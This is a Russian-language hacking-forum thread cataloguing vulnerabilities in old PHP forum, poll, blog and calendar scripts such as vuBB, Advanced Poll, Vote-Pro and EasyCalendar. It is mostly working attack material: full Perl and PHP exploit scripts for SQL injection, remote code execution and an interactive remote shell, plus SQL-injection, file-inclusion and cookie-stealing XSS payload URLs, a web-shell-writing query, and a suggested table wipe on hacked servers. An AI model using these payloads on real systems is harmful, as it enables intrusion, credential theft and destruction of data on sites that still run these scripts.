Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

Уязвимости в vuBB

Vendor: http://www.vubb.com/

vuBB alpha RC1

SQL Injection

Код:

http://host/forum/index.php?act=viewforum&f=[SQL] 

http://host/forum/index.php?act=viewtopic&t=[SQL] 

http://host/forum/index.php?act=usercp&view=[SQL]

Active XSS

В профиле пользователя содержимое многих полей не фильтруется. Атакующий может выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Passive XSS

Код:

http://www.example.com/forum/index.php?act=newreply&t='>%3CIFRAME%

20SRC=javascript:

alert(%2527XSS%2527)%3E%3C/IFRAME%3E&f=6

Path disclosure

Код:

http://www.example.com/forum/index.php?act=viewforum&f='

vuBB <=0.2

Remote SQL Injection (cookies)

http://milw0rm.com/id.php?id=1543

Index.PHP SQL Injection Vulnerability

http://www.securityfocus.com/vulnerabilities/exploits/vubb_sql_exploit.pl

vuBB <= 0.2.1

SQL Injection, XSS, CRLF Injection, Full Path Disclosure

Код:

#!/usr/bin/perl

#

# by DarkFig -- acid-root.new.fr

# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt

#

use IO::Socket;

use LWP::Simple;





# Header

print "\r\n+---------------------------------------+", "\r\n";

print "|  vuBB <= 0.2.1 [BFA] SQL Injection   -|", "\r\n";

print "+---------------------------------------+", "\r\n";





# Usage

if(!$ARGV[2]){

  print "| Usage: <host> <path> <username> ------|", "\r\n";

  print "+---------------------------------------+", "\r\n";

exit;

}





# Host

if($ARGV[0] =~ /http:\/\/(.*)/){

  $host = $1;

} else {

  $host = $ARGV[0];

}

print "[+]Host: $host\r\n";





# Var

my $path = $ARGV[1];

my $user = $ARGV[2]; print "[+]User: $user\r\n";

my $port = 80;

my $fpd  = "http://".$host.$path."includes/vubb.php";

my $err1 = "[-]Can't connect to the host\r\n";

my $err2 = "[-]Can't retrieve the full path\r\n";

my $err3 = "[-]Can't retrieve the results\r\n";

my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";





# Full Path Disclosure

$req0 = get($fpd) or die print $err1 and end();

if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) {

  $fullpath = $1."/thisismypasswd.txt";

  print "[+]Path: $1\r\n";

} else {

  print $err2 and end();

}





# Malicious data

my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on";

my $ldat = length $pdat;

my $req1 = IO::Socket::INET->new(

                                 PeerAddr => $host,

                                 PeerPort => $port,

                                 Proto => "tcp"

                                    ) or print $err1 and end();

print $req1 "$poti", "\r\n";

print $req1 "Host: $host", "\r\n";

print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n";

print $req1 "Content-Length: $ldat", "\r\n\n";

print $req1 "$pdat", "\r\n";

close($req1);





# Results

$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();

open(f, ">VUBB_RESULT.txt");

print f $req2;

close(f);

print "[+]Done: VUBB_RESULT.txt\r\n";

end();





# Bye

sub end {

print "+---------------------------------------+", "\r\n";

exit;

}

LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability

Vendor: http://sourceforge.net/project/platformdownload.php?group_id=204083

Remote SQL Injection

Vulnerable: LulieBlog Version 1.02

Exploit:

Код:

http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*

Foojan WMS 1.0 Remote Sql Injection

Vendor: http://www.iranscripts.com/download/Foojan-WMS1.0%20Full.rar

Remote Sql Injection

Vulnerable: Foojan WMS 1.0

Exploit:

Код:

http://Sitename/index.php?story=1%27union/**/select/**/0,concat(0x55736572203a20,UserName,0x202b2050617373776f7264203a,PassWord),2,3,4,5,6,7,8/**/from/**/authors/*

WSN Guest 1.21 Version Comments.PHP “ID” SQL Injection

SQL Injection

Vulnerable: WSN Guest 1.21

Exploit:

Код:

-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*

Tiger PHP News System SQL Injection

Vendor: http://tpns.k-na.se/

SQL Injection

Vulnerable: probably all:)

Exploit:

Код:

http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20fr

om%20user

The Everything Development System <= Pre-1.0 SQL Injection

Exploit:

http://milw0rm.com/exploits/5037

BookmarkX script 2007 (topicid) Remote SQL Injection

Exploit:

http://milw0rm.com/exploits/5040

BlogPHP v.2 (id) XSS / Remote SQL Injection

Exploit:

http://milw0rm.com/exploits/5042

//(с)вежачок от milw0rm.com

[..::Уязвимости скриптов голосования::..]

Nabopoll 1.2

Vendor: www.nabocorp.com/nabopoll/

Blind SQL Injection

Exploit:

PHP код:


		
			
<?

# Nabopoll Blind SQL Injection P0C Exploit

# Download: www.nabocorp.com/nabopoll/

# coded by s0cratex

# Contact: s0cratex@hotmail.com



error_reporting(0);

ini_set("max_execution_time",0);



// just change the default values...

$srv = "localhost"; $path = "/poll"; $port = 80;

$survey = "8"; //you can verify the number entering in the site and viewing the results...



echo "==================================================\n";

echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n";

echo "--------------------------------------------------\n\n";

echo " -- MySQL User: ";

$j = 1; $user = "";

while(!strstr($user,chr(0))){

for($x=0;$x<255;$x++){

$xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*";

$cnx = fsockopen($srv,$port);

fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");

while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }

fclose($cnx);

if ($x==255) {

die("\n Try again...");

}

}

$j++;

}

echo "\n";

?>

RFI

PoC:

Код:

http://www.site.com/[path]/survey.inc.php?path=http://shell.txt?

Admin without password

Код:

http://target/nabopoll/admin/config_edit.php

http://target/nabopoll/admin/template_edit.php

http://target/nabopoll/admin/survey_edit.php

*Доступ к этим файлам может получить любой пользователь, без пароля

***

PollMentor v2.0

Vendor: http://www.aspindir.com/indir.asp?id=4406

PoC:

Код:

http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--

***

Advanced Poll <= 2.0.5

Vulnerable: Advanced Poll 2.0.0 >= 2.0.5

Remote Code Execution

Exploit:

Код:

#!/usr/bin/perl -w

# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.

#

# date: 30/07/06

# 

# diwou <diwou@phucksys.org>

#

# PHCKSEC (c) 2001-2006.

#

# Hey, what a mad world!

#



use strict;

use warnings;

use LWP::UserAgent;

use MD5;



#

# args: http://url/apoll_path cmd

#

# proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/'

# url: http|https://tatget:(port)/phppoll/

#



die("RTFC! ;)") unless(@ARGV>1);



my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]);



my %ipost=

(

        poll_tplset => 'default',

        'tpl[display_head.html]' =>

<<HEAD

\\".system(getenv(HTTP_PHP)).exit().\\"

<table width="\$pollvars[table_width]" border="0" cellspacing="0" cellpadding="1" bgcolor="\$pollvars[bgcolor_fr]">

  <tr align="center">

    <td><style type="text/css">

       <!--

        .input { font-family: \$pollvars[font_face]; font-size: 8pt}

        .links { font-family: \$pollvars[font_face]; font-size: 7.5pt; color: \$pollvars[font_color]}

       -->

      </style><font face="\$pollvars[font_face]" size="-1" color="#FFFFFF"><b>\$pollvars[title]</b></font></td>

  </tr>

  <tr align="center">

    <td>

      <table width="100%" border="0" cellspacing="0" cellpadding="2" align="center" bgcolor="\$pollvars[bgcolor_tab]">

        <tr>

          <td height="40" valign="middle"><font face="\$pollvars[font_face]" color="\$pollvars[font_color]" size="1"><b>\$question</b></font></td>

        </tr>

        <tr align="right" valign="top">

          <td>

            <form method="post" action="\$this->form_forward">

            <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">

              <tr valign="top" align="center">

                <td>

                  <table width="100%" border="0" cellspacing="0" cellpadding="1" align="center">

HEAD

,

        action   =>  '',

        tplset   =>  'default',

        tpl_type =>  'display',

        session  =>  '',

        uid      =>  1

);



my %epost=

(

        session    => '',

        uid        => 1,

        poll_tplst => 'default',

        tpl_type   => 'display',

);



my %zday=

(

        username => 'jakahw4nk4h',

        'pollvars[poll_username]' => 'jakahw4nk4h',

        password => 'fuckoff',

        'pollvars[poll_password]' => ''

);



$zday{'pollvars[poll_password]'}=&md5($zday{password});

$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.

#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";



$lwp=new LWP::UserAgent();

$lwp->agent($agent);

$lwp->timeout(10);

$lwp->protocols_allowed(['http','https']);



if($ENV{PROXY})

{

        $lwp->proxy(['http','https'],$ENV{PROXY});

        print "Using proxy ".$ENV{PROXY}."\n";

}



$url.="/" if($url!~/\/$/);

$url.="admin/index.php";

print "Doing some pretty with ".$url."...\n\n";



print "+ generating session...\n";

$out=$lwp->post($url,\%zday)->content();

if($out=~ /index\.php\?session=((.){32})/)

{

        $ipost{'session'}=$epost{'session'}=$1;

        print "  session: ".$ipost{'session'}."\n";

        

        $url=~s/index\.php/admin_templates\.php/g;

        print "+ injecting diplay_head.html template...\n";

        $out=$lwp->post($url,\%ipost)->content();

        $epost{'action'}=$1 if($out=~ /<input type="submit" name="action" value="(.*)" class="button">/);

        print "  button: ".$epost{'action'}."\n";



        $url=~s/admin_templates\.php/admin_preview\.php/g;

        print "+ executing...\n";

        $out=$lwp->post($url,\%epost,PHP => "echo BOCE;".$cmd.";echo EOCE")->content();



        print "-- BOCE --\n";

        foreach $out (split(/\n/,$out))

        {

                $res=1,next if($out=~/BOCE/);

                $res=0,next if($out=~/EOCE/);

                print $out."\n" if($res);

        }

        print "-- EOCE --\n";

}

else

{

        print "don't worry, u can improve me! eh eh eh :D?\n";

}



sub md5

{

        $_=new MD5;

        $_->add(@_);

        return unpack("H*",$_->digest());

}

Remote Admin Session Generator

Exploit:

Код:

#!/usr/bin/perl -w

# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.

#

# 

# 0day!  KEEP IT PRIVATE  0day!

# 

# date: 30/07/06

# 

# diwou <diwou@phucksys.org>

#

# PHCKSEC (c) 2001-2006.

#

# see templates for code execution ;).



use strict;

use warnings;

use LWP::UserAgent;

use MD5;



my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]);

my %zday=

(

        username => 'jakahw4nk4h',

        'pollvars[poll_username]' => 'jakahw4nk4h',

        password => 'fuckoff',

        'pollvars[poll_password]' => ''

);

$zday{'pollvars[poll_password]'}=&md5($zday{password});

$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.

#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";



#

# args: url proxy(optional)

# 

# url: http|https://tatget:(port)/phppoll/

# proxy: http|https://hostname:(port)/

#

die("RTFC! ;)") unless(@ARGV);



# some lwp routines...

$lwp=new LWP::UserAgent();

$lwp->agent($agent);

$lwp->timeout(10);

$lwp->protocols_allowed(['http','https']);

$lwp->proxy(['http','https'],$proxy) if(@ARGV>1);



$url.="/" if($url!~/\/$/);

$url.="admin/index.php";

print "Using proxy ".$proxy."\n" if($proxy);

print "Doing some pretty with ".$url."...\n\n";



$out=$lwp->post($url,\%zday)->content();

if($out=~ /index\.php\?session=((.){32})/)

{

        print "well, you are a bigone ;).\n";

        print "try: ".$url."?session=".$1."&uid=1\n";

}

else

{

        print "don't worry, u can improve me! eh eh eh :D?\n";

}



sub md5

{

        $_=new MD5;

        $_->add(@_);

        return unpack("H*",$_->digest());

}

RFI

Vulnerable: Advanced Poll 2.0.2

PoC:

Код:

http://www.example.com/[path_advanced_poll]/admin/common.inc.php?base_path=http:www.example.com

***

Flipper Poll v1.1.0

Vendor: http://sourceforge.net/project/showfiles.php?group_id=59828

RFI

PoC:

Код:

/poll.php?root_path=evilscripts?

***

Vote-Pro 4.0

Vendor: http://www.vote-pro.com/

Remote Code Execution

Exploit:

Код:

use IO::Socket;



$port = "80"; # connection port

$target = shift; # vote-pro.com

$folder = shift; # /votepro/



sub Header()

{

        print q

        {Vote-Pro Code Injection Exploit - writ3r [at] gmail.com

-------------------------------------------------------

};

}



sub Usage()

{

        print q

        {

Usage: votecmd.pl [target] [directory]

Example: votecmd.pl vote-pro.com /votepro/

};

        exit();

}



Header();



if (!$target || !$folder) {

        Usage(); }



print "[+] Connecting...\n";

$cmd = "dir";

while ($cmd !~ "exit")

{

        $xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";

        print $xpack "GET ".$folder."poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=".substr($cmd, 0, -1)."; HTTP/1.1\n";

        print $xpack "Host: $target\n";

        print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";

        print $xpack "Accept: text/html\n";

        print $xpack "Connection: keep-alive\n\n";



        print "[cmd]\$ ";

        $cmd = <STDIN>;

        $cmd =~ s/ /%20/g;

}



print "[!] Connection to host lost...\n";

***

LunarPoll 1.0

Vendor: http://dexxaboy.com/scripts/lunarpoll/download/

RFI

PoC:

Код:

show.php?PollDir=http://attacker.txt?

***

cwmVote 1.0

Vendor: http://explorer.cwm-design.de/dirs/41/cwmVote.rar

RFI

PoC:

Код:

http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]

***

Absolute Poll Manager

Vendor: http://www.xigla.com/absolutepm/

XSS

Vulnerable: XIGLA SOFTWARE Absolute Poll Manager XE 4.1

PoC:

Код:

http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&amp;msg=&lt;script&gt;alert(&quot;running+code+within+the+context+of+&quot;%2bdocument.domain)&lt;/script&gt;



http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&amp;msg=&lt;script&gt;location=&quot;http://www.example2.com/?&quot;%2bdocument.cookie&lt;/script&gt;



http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&amp;msg=%3cscript%3elocation=%22http%3a//www.%65xample%2ecom/?%22%2bdocument.cookie%3c/script%3e&amp;

***

PHPCentral Poll Script

Vendor: http://www.phpcentral.org/scripts.php

Remote Command Execution

Vulnerable: PHPCentral Poll Script v1.0

PoC:

Код:

http://www.example.com/poll.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&

cmd=id



http://www.example.com/pollarchive.php?_SERVER[DOCUMENT_ROOT]=http://evi

l.txt?&cmd=id

***

X-Scripts X-Poll

SQL Injection

PoC:

Код:

http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO

OUTFILE '/usr/webserver/public_htm/rshell.php

***

Comdev Vote Caster

Vendor: http://www.comdevweb.com/votecaster.php

SQL Injection

Vulnerable: Comdev VoteCaster 3.1

PoC:

Код:

http://www.example.com/index.php?pageaction=results&campaign_id=[SQL]

***

AzDGVote

RFI

PoC:

Код:

http://www.example.com/poll/view.php?int_path=http://attacker

http://www.example.com/ordinaopenpodcast/script/poll/view.php?int_path=http://attacker

***

Active XSS 4images 1.7.6 Скорей всего и ранние версии

1 В настройках профиля(Control Panel)
в поле Homepage:

PHP код:


		
			
<img src="javascript:alert(document.cookie)"width=0>

Тестил на Opere 9.50 beta/9.21 & IE6 на Лисе не пашет =(
2 В поле Description:

PHP код:


		
			
<a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/document.cookie/**/\/**/)/**/\/**/)">

тока под IE
ыы первая бага найденая мной :D

wow-ultimate; версии: все.
/rename.php

Код:

//Проверка аккаунта

mysql_select_db($config['db_realmd']);

$query = "SELECT * FROM `account` WHERE `username`='".$acc."';" ;

скуля пост+слепая, однако на всех взломанных серверах хватило прав на into dumpfile :)
дефолтные пути:

Код:

Z:\home\[serverip]\www\

W:\home\[serverip]\www\

C:\server\mangos\diskw\www\

C:\server\diskw\www\

под никсами чаще всего
/usr/home/server/

dreammangos: версии (?)
пхп иньекции в компонентах
/media/addgalwall.php
/media/addgalscreen.php
(компоненты дефолтные) нет проверки на расширения файлов.

/ps не забудте сделать вайп :)

Цитата:

delete from `characters`.`character` where 1

EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities
-------------------------------
HomePage: http://myiosoft.com
Exploit: Multiple Remote Vulnerabilities [High]
Verified in localhost with EsayCalendar 4.0tr and magic_quotes Off
Remote SQL Injection:

Vuln File: calendar_backend.php
Exploit:

PHP код:


		
			
http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&month=2&year=-1[SQL]

Example:

PHP код:


		
			
-1+union+all+select+1,2,3,concat(username,char(54),password),5,6,7,8,9,0,1+from+dbpfixajaxp_users/*

-------------------------------------
Blind SQL Injection:

Vuln File: ajaxp_backend.php

Exploit:

PHP код:


		
			
http://localhost/PATH/ajaxp_backend.php?page=[BLIND]

Example:

PHP код:


		
			
1+and+1%3D0

-------------------------------------
Cross Site Scripting:

Vuln File: calendar_backend.php
Exploit:

PHP код:


		
			
http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&day=[XSS]

Example:

PHP код:


		
			
>'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>

=========================================
EasyGallery 5.00tr
возможно более ранние версии

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "catid" в сценарии staticpages/easygallery/index.php (когда параметр "page" установлен в значение "category"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

PHP код:


		
			
http://[host]/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL]

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "q" и в URL в сценарии staticpages/easygallery/index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: myiosoft.com/?1.9.0.0

Решение: Способов устранения уязвимости не существует в настоящее время.

=============================================